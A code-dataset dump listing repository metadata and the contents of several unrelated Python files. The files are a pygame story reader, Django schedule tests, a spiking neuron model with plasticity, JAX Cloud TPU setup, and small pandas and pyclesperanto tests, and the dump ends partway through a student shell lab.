hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e44fdf74b382389552fc4dda6ec2467a8d9f3acd | 8,335 | py | Python | src/readscreen.py | UserName21M/KS2022-Program-Glazunov | 0b7640032df9690849d6fa33cbcd32c28e37f90d | [
"Apache-2.0"
] | null | null | null | src/readscreen.py | UserName21M/KS2022-Program-Glazunov | 0b7640032df9690849d6fa33cbcd32c28e37f90d | [
"Apache-2.0"
] | null | null | null | src/readscreen.py | UserName21M/KS2022-Program-Glazunov | 0b7640032df9690849d6fa33cbcd32c28e37f90d | [
"Apache-2.0"
] | null | null | null | from drawengine import *
import catalog
class Readscreen:
def __init__(self, tale):
self.window = Singleton.window
self.parser = Singleton.parser
self.color = [Color(220, 130, 180), Color(250, 200, 230)]
self.font = pygame.font.SysFont('Comic Sans MS', 15)
self.page = 0
self.page_label = None
self.tale = tale
self.text = self.load_tale()
self.toshow = [(self.show, 0.5)]
self.labels = []
self.favor_button = None
def show(self):
if self.text == None:
self.show_load()
self.configure_tale()
button = Button(50, self.window.height + 50, width = 100, height = 50, function = self.back)
button.set_gradient((220, 130, 180), (250, 200, 230), (False, True, True))
button.set_text('Вернуться', (255, 255, 255), 16)
button.move(75, self.window.height - 50, 3)
self.page_label = Label(self.window.width / 2, self.window.height + 50, width = 50, height = 50)
self.page_label.fill((0, 0, 0, 0))
self.page_label.move(self.window.width / 2, self.window.height - 50, 3)
button = Button(self.window.width / 2, self.window.height + 50, width = 100, height = 50, function = self.next)
button.set_image(pygame.transform.scale(self.window.images['arrow_right'].copy(), (25, 50)))
button.image.set_alpha(200)
button.update_image()
button.move(self.window.width / 2 + 50, self.window.height - 50, 3)
button = Button(self.window.width / 2, self.window.height + 50, width = 100, height = 50, function = self.prev)
button.set_image(pygame.transform.scale(self.window.images['arrow_left'].copy(), (25, 50)))
button.image.set_alpha(200)
button.update_image()
button.move(self.window.width / 2 - 50, self.window.height - 50, 3)
self.favor_button = Button(self.window.width + 50, self.window.height + 50, width = 100, height = 50, function = self.add_favourite)
self.favor_button.set_gradient((220, 130, 180), (250, 200, 230), (True, True, False))
self.favor_button.move(self.window.width - 75, self.window.height - 50, 3)
self.configure()
self.change_page()
def add_favourite(self):
self.window.favourite.append(self.tale['title'])
self.window.save_favourite()
self.configure()
def remove_favourite(self):
self.window.favourite.remove(self.tale['title'])
self.window.save_favourite()
self.configure()
def configure(self):
if self.tale['title'] in self.window.favourite:
self.favor_button.set_text('Удалить из\nизбранного *', (255, 255, 255), 12)
self.favor_button.function = self.remove_favourite
else:
self.favor_button.set_text('Добавить в\nизбранное *', (255, 255, 255), 12)
self.favor_button.function = self.add_favourite
def next(self):
if self.page == len(self.pages) - 1:
return
self.page += 1
self.change_page(-1)
def prev(self):
if self.page == 0:
return
self.page -= 1
self.change_page(1)
def back(self):
self.window.change(catalog.Catalog(True))
def change_page(self, dir = -1):
for label in self.labels:
label.remove(label.position.x + self.window.width * dir * 2, label.position.y, 3, True)
self.page_label.set_text('%i/%i' % (self.page + 1, len(self.pages)), (0, 0, 0), 15)
for part in self.pages[self.page]:
label = Label(part[1][0] - self.window.width * dir, part[1][1], self.window.width, 30)
if part[2] == 1:
label.fill((0, 0, 0, 10))
if self.page == 0 and part is self.pages[self.page][0]:
label.set_text(part[0], (0, 0, 0), 20)
else:
label.set_text(part[0], (50, 50, 50), 15)
label.move(part[1][0] - self.window.width / 2 + 30 + label.text_image.get_width() / 2, part[1][1], 3, True)
elif part[2] == 2:
label.set_image(part[0])
label.move(part[1][0], part[1][1], 3, True)
self.labels.append(label)
def show_load(self):
label = Label(self.window.width / 2, -100, width = self.window.width, height = 40)
label.set_gradient((180, 110, 150), (255, 170, 220), (True, True, True))
label.set_text('Загружаем сказку', (50, 50, 50), 20)
label.move(self.window.width / 2, self.window.height / 2, 6, True)
self.text = self.parser.tale(self.tale['link'])
self.text['images'] = self.parser.download_images(self.text['image_links'], save_size = True)
self.parser.save_file(self.text, 'data/saves/' + self.tale['title'])
label.remove(self.window.width / 2, self.window.height + 100, 3, True)
def configure_tale(self):
for i in range(len(self.text['images'])):
self.text['images'][i] = pygame.image.fromstring(self.text['images'][i][0], self.text['images'][i][1], 'RGB').convert()
self.text['images'][i] = Utils.add_frame(self.text['images'][i], (160, 110, 250), 20)
index = 0
while index < len(self.text['text']) - 1:
text = self.text['text'][index]
text1 = self.text['text'][index + 1]
if text[:4] != 'img_' and text1[:4] != 'img_':
self.text['text'].pop(index)
self.text['text'].pop(index)
self.text['text'].insert(index, text + text1)
else:
index += 2
_text = []
for part in self.text['text']:
if part[:4] == 'img_':
_text.append(part)
else:
for line in part.split('\n'):
line = Utils.cut_text(line, self.font, self.window.width - 150, self.window.height - 100, False)
for a in line.split('\n'):
_text.append(a)
self.text['text'] = _text
self.pages = []
size = self.font.size(self.tale['title'])
self.pages.append([(self.tale['title'], (self.window.width / 2, 30 + size[1] / 2), 1)])
y = 30 + size[1] + 10
if self.text['author'] != None:
size = self.font.size(self.text['author'])
self.pages[-1].append((self.text['author'], (self.window.width / 2, y + size[1] / 2), 1))
y += size[1] + 10
y += 10
index, next, height = 0, None, 0
while True:
if next == None:
if index == len(self.text['text']):
break
part = self.text['text'][index]
index += 1
if part == '':
continue
if part[:4] == 'img_':
part = self.text['images'][int(part[4:])].copy()
height = part.get_height()
else:
height = self.font.size(part)[1]
else:
part = next
next = None
if y + height > self.window.height - 100:
if type(part) is str:
next = part
else:
h = self.window.height - y - 100
if h < 150:
next = part
else:
self.pages[-1].append((pygame.transform.scale(part, (int(part.get_width() * h / height), h)), (self.window.width / 2, y + h / 2), 2))
y = 30
self.pages.append([])
else:
if type(part) is str:
self.pages[-1].append((part, (self.window.width / 2, y + height / 2), 1))
y += height + 10
else:
self.pages[-1].append((part, (self.window.width / 2, y + height / 2), 2))
y += height + 10
def load_tale(self):
try:
return self.parser.load_file('data/saves/' + self.tale['title'])
except:
return None
| 40.658537 | 158 | 0.515537 |
b276463dd64f319b68313ed4b2b003aab2a4747a | 7,631 | py | Python | zsolozsma/tests/test_schedule.py | molnarm/liturgia.tv | 3c78de6dcec65262ae9e272188dbda92f71a7c15 | [
"MIT"
] | 4 | 2020-05-04T10:52:35.000Z | 2020-12-03T22:01:09.000Z | zsolozsma/tests/test_schedule.py | molnarm/liturgia.tv | 3c78de6dcec65262ae9e272188dbda92f71a7c15 | [
"MIT"
] | 27 | 2021-02-18T19:41:24.000Z | 2021-11-23T05:01:00.000Z | zsolozsma/tests/test_schedule.py | molnarm/zsolozsma | a260af574b38687cc5955bbbf76caabc779f09c4 | [
"MIT"
] | null | null | null | from datetime import datetime, timedelta
from django.test import TestCase
from zsolozsma import queries
from zsolozsma.models import *
class ScheduleTests(TestCase):
def setUp(self):
self.city1 = City.objects.create(name='City 1')
self.city2 = City.objects.create(name='City 2')
self.location1 = Location.objects.create(name='Church A',
city=self.city1)
self.location2 = Location.objects.create(name='Church B',
city=self.city1,
miserend_id=42)
self.location3 = Location.objects.create(name='Church A',
city=self.city2)
self.denomination1 = Denomination.objects.create(name='Denomination 1')
self.denomination2 = Denomination.objects.create(name='Denomination 2')
self.liturgy1 = Liturgy.objects.create(name='Liturgy 1',
denomination=self.denomination1)
self.liturgy2 = Liturgy.objects.create(name='Liturgy 2',
denomination=self.denomination2)
self.now = datetime.now()
self.today = self.now.date()
self.later = (self.now + timedelta(hours=1)).time()
for location in Location.objects.all():
for liturgy in Liturgy.objects.all():
EventSchedule.objects.create(location=location,
liturgy=liturgy,
name=location.name + ' ' +
liturgy.name,
day_of_week=self.today.weekday(),
time=self.later)
def test_query_city_filter(self):
schedule = queries.get_schedule(city_slug='city-1')
self.__assert_schedule([('Church A Liturgy 1', 'City 1'),
('Church A Liturgy 2', 'City 1'),
('Church B Liturgy 1', 'City 1'),
('Church B Liturgy 2', 'City 1')], schedule)
def test_query_location_filter(self):
schedule = queries.get_schedule(location_slug='church-a')
self.__assert_schedule([('Church A Liturgy 1', 'City 1'),
('Church A Liturgy 2', 'City 1'),
('Church A Liturgy 1', 'City 2'),
('Church A Liturgy 2', 'City 2')], schedule)
def test_query_city_location_filter(self):
schedule = queries.get_schedule(city_slug='city-1',
location_slug='church-a')
self.__assert_schedule([('Church A Liturgy 1', 'City 1'),
('Church A Liturgy 2', 'City 1')], schedule)
def test_query_denomination_filter(self):
schedule = queries.get_schedule(denomination_slug='denomination-1')
self.__assert_schedule([('Church A Liturgy 1', 'City 1'),
('Church B Liturgy 1', 'City 1'),
('Church A Liturgy 1', 'City 2')], schedule)
def test_query_denomination_city_filter(self):
schedule = queries.get_schedule(denomination_slug='denomination-1',
city_slug='city-2')
self.__assert_schedule([('Church A Liturgy 1', 'City 2')], schedule)
def test_liturgy_filter(self):
schedule = queries.get_schedule(liturgy_slug='liturgy-2')
self.__assert_schedule([('Church A Liturgy 2', 'City 1'),
('Church B Liturgy 2', 'City 1'),
('Church A Liturgy 2', 'City 2')], schedule)
def test_miserend_filter(self):
schedule = queries.get_schedule(miserend_id=42)
self.__assert_schedule([('Church B Liturgy 1', 'City 1'),
('Church B Liturgy 2', 'City 1')], schedule)
def test_validity(self):
schedule11 = EventSchedule.objects.get(location=self.location1,
liturgy=self.liturgy1)
schedule11.valid_from = self.today + timedelta(days=1)
schedule11.save()
schedule12 = EventSchedule.objects.get(location=self.location1,
liturgy=self.liturgy2)
schedule12.valid_to = self.today + timedelta(days=-1)
schedule12.save()
schedule = queries.get_schedule()
self.__assert_schedule([('Church B Liturgy 1', 'City 1'),
('Church B Liturgy 2', 'City 1'),
('Church A Liturgy 1', 'City 2'),
('Church A Liturgy 2', 'City 2')], schedule)
def test_is_extraordinary(self):
schedule11 = EventSchedule.objects.get(location=self.location1,
liturgy=self.liturgy1)
schedule11.is_extraordinary = True
schedule11.save()
schedule21 = EventSchedule.objects.get(location=self.location2,
liturgy=self.liturgy1)
schedule21.is_extraordinary = True
schedule21.save()
schedule22 = EventSchedule.objects.get(location=self.location2,
liturgy=self.liturgy2)
schedule22.is_extraordinary = True
schedule22.save()
schedule = queries.get_schedule()
self.__assert_schedule([('Church A Liturgy 1', 'City 1'),
('Church B Liturgy 1', 'City 1'),
('Church B Liturgy 2', 'City 1'),
('Church A Liturgy 1', 'City 2'),
('Church A Liturgy 2', 'City 2')], schedule)
def test_is_active(self):
self.location1.is_active = False
self.location1.save()
schedule = queries.get_schedule()
self.__assert_schedule([('Church B Liturgy 1', 'City 1'),
('Church B Liturgy 2', 'City 1'),
('Church A Liturgy 1', 'City 2'),
('Church A Liturgy 2', 'City 2')], schedule)
def test_duration(self):
self.liturgy1.duration = 50
self.liturgy1.save()
event11 = EventSchedule.objects.get(location=self.location1,
liturgy=self.liturgy1)
event11.duration = 40
event11.save()
schedule = queries.get_schedule(city_slug='city-1')
expected = [('Church A Liturgy 1', 'City 1', 40),
('Church A Liturgy 2', 'City 1', 60),
('Church B Liturgy 1', 'City 1', 50),
('Church B Liturgy 2', 'City 1', 60)]
for expected_item, actual_item in zip(expected, schedule):
self.assertEqual(expected_item,
(actual_item.name, actual_item.city_name,
actual_item.duration))
def __assert_schedule(self, expected, schedule):
self.assertEqual(len(expected), len(schedule))
for expected_item, actual_item in zip(expected, schedule):
self.assertEqual(expected_item,
(actual_item.name, actual_item.city_name))
| 45.694611 | 80 | 0.507011 |
dc1242f5bc72f70097f500a70a7c0aa092503c2c | 12,177 | py | Python | PBLIF.py | DavidCromp/MPS_Antidromic_STDP | 2941f7ad90fbd64b9b81de7fc33522365da398b4 | [
"MIT"
] | null | null | null | PBLIF.py | DavidCromp/MPS_Antidromic_STDP | 2941f7ad90fbd64b9b81de7fc33522365da398b4 | [
"MIT"
] | null | null | null | PBLIF.py | DavidCromp/MPS_Antidromic_STDP | 2941f7ad90fbd64b9b81de7fc33522365da398b4 | [
"MIT"
] | null | null | null | from math import pi, exp,sin
import numpy as np
def inj(t):
return ((t>250 and t<750) or (t>3500 and t<5500))\
*0.000015#*(sin(t/(2*pi)*0.5+1))
class PBLIF:
"""A Pulse Based Leaky Integrate and Fire model"""
def __init__(self):
# Initial State of variables
# t, Vd, Vs
self.t=[0]
self.V=[[0,0]]
# Record internal dynamics?
self.record=False
# default time parameters
self.dt=0.1 # ms
self.tstop=2000 #ms
# m,h,n,q
self.m=[0]
self.h=[0]
self.n=[0]
self.q=[0]
# Plasticity Weights and parameters
self.connections = []
self.delays = []
self.r0 = [] # Last r0 when switching pulse state
self.rstate = [] # pulse state of presynapse
self.weights = []
self.synSpikeTime= []
self.xj = [] # Presynaptic trace
self.yi = [] # Postsynaptic trace
### Record weights
self.recordCon = False
self.rweights = [[]]
self.rxj = [[]]
self.ryi = [[]]
# List of times where spikes occurred in Soma and Axon
self.somaSpike = []
self.axonSpike = []
self.axonTime = 1.5 # ms
self.refractoryPeriod = 5 # ms
self.axonSpikeTime = -self.refractoryPeriod-0.1 # This allows for spikes to occur at the beginning of the simulation
self.axonRelayed = True # Whether an axonal spike has propogated to the Soma
## A connection consists of another PBLIF and a paired weight value
## weight is pair based and formulation is based upon work by
## https://www.frontiersin.org/articles/10.3389/fnsyn.2016.00038/full
## weights and connections are index matched, post-synapse connection
## is stored in self.connections, presynaptic neuron is self
# Ion Currents Over Tie
self.INa=[0]
self.IKf=[0]
self.IKs=[0]
# values for analytical solution to pulse based ODEs
self.t0=0
self.m0=0
self.h0=0
self.n0=0
self.q0=0
# Gate pulse parameters
self.AM=22 # ms^-1
self.BM=13 # ms^-1
self.AH=0.5 # ms^-1
self.BH=4 # ms^-1
self.AN=1.5 # ms^-1
self.BN=0.1 # ms^-1
self.AQ=1.5 # ms^-1
self.BQ=0.025 # ms^-1
# Physical Dimensions and Measures
### Dendrite
# Radius
self.rd = 42/2 # (41.5-62.5)/2 um
self.rd/=10000 # convert to cm
# Length
self.ld = 5600 # 5519-6789 um
self.ld/=10000 # convert to cm
# Resistance
self.Rmd = 12000 # 10650-14350 Ohm cm^2
### Soma
# Radius
self.rs = 78/2 # (77.5-82.5)/2 um
self.rs/=10000 # convert to cm
# Length
self.ls = 80 # 77.5-82.5 um
self.ls/=10000 # convert to cm
# Resistance
self.Rms = 1100 # 1050-1150 Ohm cm^2
### Cytoplasm
# Resistance
self.Ri = 70 # 70 Ohm cm
# Conductances
### Dendrite
self.gld = (2*pi*self.rd*self.ld)/(self.Rmd) # Ohm^-1
### Soma
self.gls = (2*pi*self.rs*self.ls)/(self.Rms) # Ohm^-1
### Coupling
self.gc = 2/( ((self.Ri*self.ld)/(pi*self.rd**2)) +\
((self.Ri*self.ls)/(pi*self.rs**2)) ) # Ohm^-1
### Sodium
self.gNa = 55 # mS/cm^2
### Potassium
self.gKf = 4 # mS/cm^2
self.gKs = 16 # mS/cm^2
#### UNIT SCALING
### Sodium
self.gNa/=10000000 # Ohm^-1/cm^2
### Potassium
self.gKf/=10000000 # Ohm^-1/cm^2
self.gKs/=10000000 # Ohm^-1/cm^2
# Synaptic Conductance
self.gSyn=1/10000000
# Capacitances
### Membrane Capacitance
self.Cm = 1 # uF/cm^2
self.Cm/=1e3 # convert to milliFarad
### Dendrite Capacitance
self.Cd = 2*pi*self.rd*self.ld*self.Cm # mF
### Soma Capacitance
self.Cs = 2*pi*self.rs*self.ls*self.Cm # mF
# Equilibrium Potentials
### Leak
self.El = 0 # mV
### Sodium
self.ENa = 120 #mV
### Potassium
self.EK = -10 #mV
# Inputs
### Injected
self.Iinj_d = inj
self.Iinj_s = lambda t: 0
self.Iinj_a = lambda t: 0
### Synaptic
self.Isyn_d=0
self.Isyn_s=0
# Rheo and Threshold
self.rheo = 4 # 3.5-6.5 nA
self.rheo/= 1000000 # Convert to milliamp
self.rn = 1/(self.gls + (self.gld * self.gc)/(self.gld + self.gc))
self.threshold = self.rheo*self.rn # Threshold in mV/cm^2
### Pulse state
self.pulseState = False
def ddt(self,slope,t,V):
# V[0] = dendrite voltage
# V[1] = Soma Voltage
def changeState():
self.t0=t
self.m0=self.m[-1]
self.h0=self.h[-1]
self.n0=self.n[-1]
self.q0=self.q[-1]
self.pulseState = not self.pulseState
def gateVal(alpha,beta,v0,pulse):
ret=0;
if (pulse):
ret = v0 * exp(-beta*(t - self.t0));
else:
ret = 1 + (v0 - 1) * exp(-alpha*(t - self.t0));
return ret
if (slope==1):
if (V[1]>self.threshold and not self.pulseState):
self.somaSpike.append(t)
changeState()
if (self.pulseState):
if (t-self.t0 > 0.6):
changeState()
m = gateVal(self.AM,self.BM,self.m0,not self.pulseState)
h = gateVal(self.AH,self.BH,self.h0, self.pulseState)
n = gateVal(self.AN,self.BN,self.n0,not self.pulseState)
q = gateVal(self.AQ,self.BQ,self.q0,not self.pulseState)
iNa = self.gNa * m**3 * h * (V[1]-self.ENa)
iKf = self.gKf * n**4 * (V[1]-self.EK)
iKs = self.gKs * q**2 * (V[1]-self.EK)
Iion = iNa + iKf + iKs
if slope == 1:
self.Isyn_d = 0
for idx,syn in enumerate(self.connections):
r=0
w=self.weights[idx]
spikeTimes = [time for time in syn.somaSpike\
if time+self.delays[idx]<t\
# Spike has been received\
and\
t-(time+self.delays[idx])<20]
# TODO: tweak spike history
for spikeTime in spikeTimes:
ts = spikeTime + self.delays[idx]
rs = self.rstate[idx]
r0 = self.r0[idx]
Tmax = 1 # mM
alpha = 2 # msec^-1 mM^-1
beta = 1 # msec^-1
if t-ts<1:
if not rs:
self.r0[idx] = r0*exp(-beta*(t-(ts+1)))
self.rstate[idx] = True
rinf = (alpha*Tmax)/(alpha*Tmax+beta)
taur = 1/(alpha*Tmax+beta)
r = rinf + (r0-rinf)*exp(-(t-ts)/taur)
else:
if rs:
rinf = (alpha*Tmax)/(alpha*Tmax+beta)
taur = 1/(alpha*Tmax+beta)
self.r0[idx] = rinf + (r0-rinf)*exp(-(t-ts)/taur)
self.rstate[idx] = False
r = r0*exp(-beta*(t-(ts+1)))
### Update weight
ya = 1 # Post/After spike
yb = -1 # Pre/Before spike
Ap = ya*3e-4 # Potentiation
Ad = yb*3e-4 # Depression
# Implemented As Per Pedrosa V, Clopath C (2017)
# xj = prepostout
# yi = postpreout
newSpike=False
lastSpikeTime = self.synSpikeTime[idx]
if ts>lastSpikeTime:
self.synSpikeTime[idx]=ts
newSpike=True
self.xj[idx] = self.xj[idx] -\
self.xj[idx]*self.dt/8 +\
self.pulseState*1
self.yi[idx] = self.yi[idx] -\
self.yi[idx]*self.dt/8 +\
newSpike*1
self.weights[idx] = w + self.xj[idx]*newSpike*Ad \
+ self.yi[idx]*self.pulseState*Ap
w=self.weights[idx]
up_bound = 2 # Maximum Weight
w = w - (w - up_bound)*(w>up_bound) - (w)*(w<0.)
self.weights[idx] = w
#TODO: Make separate dendritic compartments where gSyn[] contains the conductances based on recent spikes presynaptic to them
# acting as a saturation of neuromodulators, look into literature for limits on such
self.Isyn_d = self.Isyn_d + w * self.gSyn * r * (V[0]-70)
# 70 is for excitatory
# -16 for inhib
# Check for axon current being greater than threshold
if (self.Iinj_a(self.t[-1]) >=1 \
and (self.t[-1] - self.axonSpikeTime) > self.refractoryPeriod):
if (self.t[-1] > (self.axonSpikeTime + self.axonTime)):
# Ensure soma spike has occured:
if (len(self.somaSpike)>0 \
and self.t[-1] > self.somaSpike[-1]+self.refractoryPeriod)\
or (len(self.somaSpike)==0):
self.somaSpike.append(self.t[-1])
self.t0=self.t[-1]
self.m0=self.m[-1]
self.h0=self.h[-1]
self.n0=self.n[-1]
self.q0=self.q[-1]
self.pulseState = not self.pulseState
self.axonSpikeTime = self.t[-1]
self.axonRelayed = False
self.axonSpike.append(self.t[-1])
# TODO: Make not dependent upon refractory period i.e.
# iterate all not processed or cancelled spikes
if (slope==1):
# m,h,n,q
if (self.record):
self.m.append(m)
self.h.append(h)
self.n.append(n)
self.q.append(q)
# Currents over time
self.INa.append(iNa)
self.IKf.append(iKf)
self.IKs.append(iKs)
else:
self.m[-1]=m
self.h[-1]=h
self.n[-1]=n
self.q[-1]=q
dVdt = np.array([
(-self.Isyn_d-self.gld*(V[0]-self.El)-self.gc*(V[0]-V[1])+self.Iinj_d(t))/self.Cd,
(-self.Isyn_s-self.gls*(V[1]-self.El)-self.gc*(V[1]-V[0])-Iion+self.Iinj_s(t))/self.Cs
])
return dVdt
def rk4Step(self):
k1 = self.dt * self.ddt(1,self.t[-1], self.V[-1])
k2 = self.dt * self.ddt(2,self.t[-1] + 0.5 * self.dt, self.V[-1] + 0.5 * k1)
k3 = self.dt * self.ddt(3,self.t[-1] + 0.5 * self.dt, self.V[-1] + 0.5 * k2)
k4 = self.dt * self.ddt(4,self.t[-1] + self.dt, self.V[-1] + k3)
V = self.V[-1] + (1.0 / 6.0)*(k1 + 2 * k2 + 2 * k3 + k4)
t = self.t[-1] + self.dt
if (self.record):
self.V.append(V)
self.t.append(t)
else:
self.V[-1]=V
self.t[-1]=t
def connect(self, neuron):
"""Connect axon to dendrite of other neuron"""
self.connections.append(neuron)
self.delays.append(abs(np.random.normal(23,0)))
self.weights.append(1)
self.synSpikeTime.append(0)
self.xj.append(0)
self.yi.append(0)
self.r0.append(0)
self.rstate.append(True)
| 37.352761 | 141 | 0.45783 |
b788774f6a496165d21613f15abd8bedfa885a4e | 3,776 | py | Python | jax/_src/cloud_tpu_init.py | darshitsharma/jax | 90f926ac6b4962cfc23779b44e04202e22373f4d | [
"Apache-2.0"
] | 2 | 2021-09-27T06:33:20.000Z | 2022-01-08T10:03:33.000Z | jax/_src/cloud_tpu_init.py | darshitsharma/jax | 90f926ac6b4962cfc23779b44e04202e22373f4d | [
"Apache-2.0"
] | null | null | null | jax/_src/cloud_tpu_init.py | darshitsharma/jax | 90f926ac6b4962cfc23779b44e04202e22373f4d | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
def cloud_tpu_init():
"""Automatically sets Cloud TPU topology and other env vars.
**This must be called before the TPU runtime is loaded, which happens as soon
as JAX's C++ backend is loaded! I.e. call this before xla_bridge or xla_client
is imported.**
Safe to call in non-Cloud TPU environments.
Some of these environment variables are used to tell the TPU runtime what kind
of mesh topology to use. It assumes a single-host topology by default, so we
manually set them here to default to the full pod slice if applicable.
This will not set any env vars if a single topology-related env var is already
set.
"""
try:
# pylint: disable=import-outside-toplevel
# pytype: disable=import-error
import libtpu
# pytype: enable=import-error
# pylint: enable=import-outside-toplevel
except ImportError:
# We assume libtpu is installed iff we're in a correctly-configured Cloud
# TPU environment. Exit early if we're not running on Cloud TPU.
return
libtpu.configure_library_path()
os.environ.setdefault('GRPC_VERBOSITY', 'ERROR')
# If the user has set any topology-related env vars, don't set any
# automatically.
if any([
os.environ.get('CLOUD_TPU_TASK_ID', None),
os.environ.get('TPU_CHIPS_PER_HOST_BOUNDS', None),
os.environ.get('TPU_HOST_BOUNDS', None),
os.environ.get('TPU_MESH_CONTROLLER_ADDRESS', None),
os.environ.get('TPU_MESH_CONTROLLER_PORT', None),
os.environ.get('TPU_VISIBLE_DEVICES', None),
]):
return
# pylint: disable=import-outside-toplevel
# pytype: disable=import-error
import requests
import time
# pytype: enable=import-error
# pylint: enable=import-outside-toplevel
# Based on https://github.com/tensorflow/tensorflow/pull/40317
gce_metadata_endpoint = 'http://' + os.environ.get(
'GCE_METADATA_IP', 'metadata.google.internal')
def get_metadata(key):
retry_count = 0
retrySeconds = 0.500
api_resp = None
while retry_count < 6:
api_resp = requests.get(
f'{gce_metadata_endpoint}/computeMetadata/v1/instance/attributes/{key}',
headers={'Metadata-Flavor': 'Google'})
if api_resp.status == 200:
break
retry_count += 1
time.sleep(retrySeconds)
if api_resp is None:
raise RuntimeError(f"Getting metadata['{key}'] failed for 6 tries")
return api_resp.text
worker_id = get_metadata('agent-worker-number')
accelerator_type = get_metadata('accelerator-type')
accelerator_type_to_host_bounds = {
'v2-8': '1,1,1',
'v2-32': '2,2,1',
'v2-128': '4,4,1',
'v2-256': '4,8,1',
'v2-512': '8,8,1',
'v3-8': '1,1,1',
'v3-32': '2,2,1',
'v3-64': '2,4,1',
'v3-128': '4,4,1',
'v3-256': '4,8,1',
'v3-512': '8,8,1',
'v3-1024': '8,16,1',
'v3-2048': '16,16,1',
}
os.environ['CLOUD_TPU_TASK_ID'] = worker_id
# If v4 TPU don't set any topology related flags, libtpu will set these values.
if not accelerator_type.startswith('v4-'):
os.environ['TPU_CHIPS_PER_HOST_BOUNDS'] = '2,2,1'
os.environ['TPU_HOST_BOUNDS'] = accelerator_type_to_host_bounds[
accelerator_type]
| 32.834783 | 82 | 0.684587 |
0f6342aa62ac02b57610e7a0770e98ac22c3fd57 | 390 | py | Python | pandas/tests/io/sas/test_sas.py | robbuckley/pandas | aa7cb0138da6e20b356e8d9ae1f184e78a04189f | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | pandas/tests/io/sas/test_sas.py | robbuckley/pandas | aa7cb0138da6e20b356e8d9ae1f184e78a04189f | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | pandas/tests/io/sas/test_sas.py | robbuckley/pandas | aa7cb0138da6e20b356e8d9ae1f184e78a04189f | [
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | import pytest
from pandas.compat import StringIO
from pandas import read_sas
class TestSas(object):
def test_sas_buffer_format(self):
# see gh-14947
b = StringIO("")
msg = ("If this is a buffer object rather than a string "
"name, you must specify a format string")
with pytest.raises(ValueError, match=msg):
read_sas(b)
| 21.666667 | 65 | 0.633333 |
01e3727da95a7367f41b7450467b8cf4844cacbb | 720 | py | Python | tests/test_euclidean_distance_from_label_centroid_map.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 64 | 2020-03-18T12:11:22.000Z | 2022-03-31T08:19:18.000Z | tests/test_euclidean_distance_from_label_centroid_map.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 148 | 2020-05-14T06:14:11.000Z | 2022-03-26T15:02:31.000Z | tests/test_euclidean_distance_from_label_centroid_map.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 16 | 2020-05-31T00:53:44.000Z | 2022-03-23T13:20:57.000Z | import pyclesperanto_prototype as cle
import numpy as np
def test_euclidean_distance_from_label_centroid_map():
labels = cle.push(np.asarray([
[1, 1, 1, 2],
[1, 1, 1, 2],
[1, 1, 1, 2],
[2, 2, 2, 2]
]))
reference = cle.push(np.asarray([
[1.4142135, 1, 1.4142135, 2.3079278],
[1, 0, 1, 1.4285713],
[1.4142135, 1, 1.4142135, 0.86896616],
[2.3079278, 1.4285713, 0.86896616, 1.2121831]
]
))
print(cle.centroids_of_background_and_labels(labels))
result = cle.euclidean_distance_from_label_centroid_map(labels)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
print(b)
assert (np.allclose(a, b, 0.001))
| 23.225806 | 67 | 0.593056 |
0dcee3fb3280db406089e863d87edeaa552bed55 | 4,052 | py | Python | shell/lab1.py | utep-cs-systems-courses/os-shell-gavinbaechle | 71a4957b22a003894743a8564317c2275a7af902 | [
"BSD-3-Clause"
] | null | null | null | shell/lab1.py | utep-cs-systems-courses/os-shell-gavinbaechle | 71a4957b22a003894743a8564317c2275a7af902 | [
"BSD-3-Clause"
] | null | null | null | shell/lab1.py | utep-cs-systems-courses/os-shell-gavinbaechle | 71a4957b22a003894743a8564317c2275a7af902 | [
"BSD-3-Clause"
] | null | null | null | #r/bin/env python3
import os, sys, re
def inputHandler(args):
wait_child = True
if len(args) == 0: #checks if there is an arguement
return
if "exit" in args:
sys.exit(0)
# Here we are changing the directory
elif "cd" == args[0]:
try:
if len(args)==1: # This is here if cd is specified then reprompt the user
return
else:
os.chdir(args[1])
